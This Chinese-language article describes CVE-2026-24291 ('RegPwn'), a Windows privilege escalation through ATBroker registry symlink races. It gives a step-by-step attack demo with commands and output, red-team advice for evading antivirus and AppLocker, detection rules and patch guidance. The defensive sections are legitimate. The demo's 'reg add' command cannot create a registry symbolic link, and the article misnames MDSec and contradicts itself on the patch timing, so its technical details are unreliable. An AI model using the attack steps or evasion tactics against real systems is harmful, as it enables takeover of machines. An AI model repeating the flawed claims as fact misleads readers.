Windows 11 24H2中近期被披露了一个高危本地权限提升漏洞

导语一个普通用户无需任何特殊权限只需在锁屏界面上触发一次竞争条件就能获得系统的最高控制权——这正是CVE-2026-24291代号RegPwn所实现的效果。2026年3月这个潜伏在Windows辅助功能ATConfig机制中的高危漏洞被公开披露影响从Windows 11 24H2到Windows Server 2025的多个主流版本。攻击者可以利用它悄无声息地将权限从用户提升到SYSTEM从而完全掌控目标机器。一、漏洞概述CVE-2026-24291是一个高危本地权限提升漏洞由英国安全公司MDSecMandiant Security Consulting的研究员发现并报告给微软。该漏洞的核心在于Windows辅助功能基础设施Accessibility Infrastructure中的ATBroker.exe组件对注册表操作的错误处理。漏洞被命名为RegPwn——这个名字精准地概括了它的本质通过注册表Registry滥用实现权限劫持Pwn。与许多依赖复杂内存破坏的提权漏洞不同RegPwn是一个逻辑层面的漏洞利用Windows安全桌面切换过程中的时序竞争条件通过注册表符号链接Registry Symbolic Link将低权限的注册表写操作重定向到高权限的系统注册表项。这个漏洞的CVSS评分为9.1高危攻击复杂度低且无需任何用户交互除了触发锁屏这一系统固有行为。在2026年3月微软补丁星期二Patch Tuesday发布修复前全球数以亿计的Windows设备都暴露在此风险之下。二、技术原理2.1 受影响组件ATBroker.exe与ATConfig机制ATBroker.exeAssistive Technology Broker是Windows辅助功能代理服务负责管理屏幕阅读器、屏幕键盘、放大镜等辅助工具。它运行在SYSTEM权限下并与用户会话通过注册表进行通信。ATConfig机制是ATBroker用于保存和加载辅助功能配置的注册表结构主要路径包括HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Accessibility以及关联的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\下的服务配置关键问题在于当用户锁定工作站WinL或触发UAC提权时ATBroker会从用户注册表项读取配置然后以SYSTEM权限写入到系统注册表项。这个从低权限到高权限的信任传递环节正是攻击的突破口。2.2 漏洞本质注册表符号链接竞争条件漏洞根源在于Windows对注册表符号链接的创建和解析缺乏严格的权限验证。攻击流程如下阶段1符号链接预创建攻击者在自己的HKEY_CURRENT_USER下创建一个注册表符号链接指向受保护的系统注册表项例如HKLM\SYSTEM\CurrentControlSet\Services\下的某个服务项。例如REG ADD HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig /ve /d \??\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver /f阶段2竞争窗口当用户执行锁定工作站Lock Workstation操作时系统会切换到安全桌面Secure Desktop。此时ATBroker.exe会读取ATConfig配置并尝试将辅助功能设置同步到系统注册表项——正是这个同步过程ATBroker会无差别地跟随符号链接将数据写入攻击者指定的位置。阶段3权限提升攻击者通过符号链接将恶意数据写入到敏感的系统服务配置项如ImagePath从而控制随系统启动的高权限进程最终实现从普通用户到SYSTEM的提权。2.3 关键CWE漏洞类型CWE编号描述CWE-362并发执行不正确的同步Race Condition——攻击利用了锁屏切换的时间窗口CWE-59通过符号链接进行不正确的链接解析Link Following——注册表符号链接未验证目标CWE-732不正确的权限分配——HKCU与HKLM之间的信任边界不清晰三、攻击演示根据公开的PoC概念验证代码攻击流程可以简化为以下步骤第一步检查环境# 确认当前为普通用户 whoami # 输出DESKTOP-XXXX\普通用户第二步创建符号链接低权限操作# 利用reg.exe命令创建指向敏感注册表项的符号链接 reg add HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig /ve /d \??\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver /f第三步触发竞争条件# 锁定工作站触发ATBroker在安全桌面的配置同步 rundll32.exe user32.dll,LockWorkStation第四步验证提权等待锁屏结束后解锁执行whoami # 输出NT AUTHORITY\SYSTEM此时攻击者已拥有系统最高权限可以禁用安全软件安装持久化后门横向移动到域内其他主机导出敏感数据如lsass.exe内存中的哈希四、实际影响4.1 受影响版本根据微软安全公告和公开研究受CVE-2026-24291影响的Windows版本包括操作系统受影响版本修复状态Windows 1122H2, 23H2,24H2✓ 已修复KB5077181Windows 1021H2, Enterprise LTSC✓ 已修复Windows Server2016, 2019, 2022, 2025✓ 已修复Windows 11 24H2作为微软最新的桌面操作系统版本在漏洞披露时正处于广泛部署阶段因此受影响面极广。4.2 利用门槛与攻击场景条件要求初始权限普通用户/访客账户Medium Integrity Level物理/远程本地登录物理访问或RDP会话用户交互无需用户确认仅需锁屏触发系统固有行为攻击复杂度低单行命令即可完成典型攻击场景内网渗透后期红队通过钓鱼或Web漏洞获得一个普通用户权限的RDP会话利用该漏洞快速提升至SYSTEM物理访问攻击攻击者在目标办公室短暂接触 unlocked 的电脑快速提权安装持久化后门恶意软件利用已感染的设备上的恶意软件定期触发该漏洞以维持高权限持久性五、漏洞披露与利用代码5.1 时间线2025年12月MDSec研究员首次向微软报告该漏洞2026年2月微软确认漏洞并开始开发补丁2026年3月10日微软发布带外Out-of-Band安全更新修复CVE-2026-242912026年3月中旬补丁细节公开PoC代码在GitHub上发布2026年3月下旬Brute Ratel C4红队工具框架集成BOFBeacon Object File形式的利用模块5.2 公开利用代码目前已有多个公开的PoC/EXP实现GitHub PoClennertdefauw/CVE-2026-24291纯C实现直接调用Windows API编译为独立可执行文件自动检测系统版本并执行攻击链Brute Ratel C4 BOF模块BOFBeacon Object File格式可在Cobalt Strike/BRc4框架内直接加载更小的内存占用更适合红队隐蔽渗透支持参数化目标注册表路径Metasploit模块社区贡献集成到Metasploit Framework的post/windows/escalate/regpwn模块可与其他渗透模块联动六、检测与取证6.1 Windows事件日志监控defenders应重点关注以下事件ID事件ID来源描述4657Security注册表值被修改——关注HKLM\SYSTEM\CurrentControlSet\Services下的修改4688Security创建新进程——观察cmd.exe/powershell.exe的SYSTEM级父进程4670Security对象权限被更改——注册表项的ACL变更7036Service Control Manager服务状态变更——可疑服务被创建或启动1001ApplicationWindows错误报告——ATBroker异常崩溃可能暗示攻击6.2 Sysmon关键规则!-- 监控ATBroker进程树 -- RuleGroup name groupRelationor ProcessCreate onmatchexclude Image conditionisC:\Windows\System32\ATBroker.exe/Image /ProcessCreate /RuleGroup !-- 监控HKLM注册表写入 -- RuleGroup name groupRelationor RegistryEvent onmatchinclude TargetObject conditioncontains\SYSTEM\CurrentControlSet\Services\/TargetObject /RegistryEvent /RuleGroup6.3 行为指标IoCs指标类型具体表现进程行为ATBroker.exe在锁屏后短时间内启动子进程如reg.exe、powershell.exe注册表活动HKCU...\ATConfig 路径下出现指向HKLM的符号链接类型REG_LINK网络行为提权后短时间内出现异常出站连接C2回连文件活动msiserver服务的ImagePath被修改为非常规路径七、缓解与修复7.1 官方补丁微软已在2026年3月10日发布带外安全更新修复此漏洞Windows 11 24H2安装KB5077181或更高版本Windows 11 23H2/22H2安装KB5075897Windows Server 2025 24H2安装KB5075899Windows Server 2022安装KB5075897验证修复# 查看已安装的补丁 Get-HotFix | Where-Object {$_.HotFixID -match KB5077181|KB5075897|KB5075899} # 或使用wmic wmic qfe list brief /format:table | findstr KB50771817.2 临时缓解措施无法立即打补丁限制ATBroker执行权限# 禁用辅助功能代理会影响屏幕阅读器等辅助功能 sc config BrokerInfrastructure start disabled net stop BrokerInfrastructure注册表权限加固# 限制HKCU\...\ATConfig键的写入权限 regini.exe system.ini内容HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig D:P(A;;GA;;;SY)(A;;GR;;;BU)(A;;GR;;;IU)启用UAC始终通知# 强制UAC始终在安全桌面提示增加攻击成本 Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 2部署AppLocker或WDAC创建规则禁止未签名的可执行文件从临时目录运行阻止PoC脚本执行。7.3 渗透测试视角的绕过思路对于红队而言目标环境中大概率已部署基础防护。以下是在受限环境中尝试利用该漏洞的几种思路限制条件绕过策略杀毒软件实时监控将payload注入合法进程内存如notepad.exe避免落地文件AppLocker白名单使用已签名的系统二进制文件如msbuild.exe加载恶意配置无法创建符号链接利用Junction替代Symbolic Link需SeCreateSymbolicLinkPrivilege无法锁定工作站模拟安全桌面切换SendMessage/SendInput触发锁屏API八、红队应用与防御建议8.1 对攻击者的价值CVE-2026-24291是一个完美的红队提权工具稳定性高基于逻辑漏洞而非内存破坏极少触发蓝屏或崩溃隐蔽性强不涉及异常驱动加载或敏感注册表项的直接修改兼容性好适用于从Windows 10到Windows Server 2025的广泛版本免杀容易纯用户态操作无shellcode或驱动签名绕过需求在红队评估中该漏洞常被用于横向移动后的快速权限提升阶段——当攻击者通过钓鱼获得一个普通用户RDP会话后使用该漏洞在30秒内完成提权从而为后续的域内活动扫清障碍。8.2 对防御者的建议优先补丁将KB5077181/KB5075897/KB5075899列为关键补丁72小时内完成全网部署监控ATBroker异常在EDR/XDR平台配置针对ATBroker.exe进程树异常的告警规则最小权限原则限制普通用户对HKLM\SYSTEM\CurrentControlSet\Services\路径的访问权限定期权限审计使用Get-Acl或RegDACL检查注册表关键路径的ACL配置模拟攻击测试在非生产环境运行公开PoC验证检测规则的有效性九、总结CVE-2026-24291RegPwn代表了现代Windows内核中一类危险的逻辑漏洞辅助功能机制与注册表安全模型之间的信任错位。攻击者不需要复杂的利用链也不需要绕过任何内存保护机制仅通过精心构造的符号链接和一次锁屏触发就能将普通用户权限直接提升至SYSTEM。这个漏洞的披露再次提醒我们提权漏洞的本质是权限边界的模糊。即使是最底层的系统组件如ATBroker在处理跨权限边界的操作时也必须遵循绝不信任用户输入的原则。对于 defenders 而言理解这类漏洞的原理有助于构建更有效的检测规则——监控ATBroker进程、注册表符号链接创建、以及HKLM服务的非预期修改都是可以立即落手的检测点。对于 red teamers 而言CVE-2026-24291是一个值得加入武器库的高稳定性提权选项。但在实际使用中务必注意目标环境是否已修补并准备好应对EDR对ATBroker异常行为的告警。版权声明本文由华盟网原创发布保留所有权利。配图由华盟网授权使用。另点击下方工具可免费使用阿祥自制的ICT随身工具箱↓常用厂商指令查找、故障码查询、快捷脚本生成一网打尽。不想错过文章内容读完请点一下“在看”加个“关注”您的支持是我创作的动力期待您的一键三连支持点赞、在看、分享~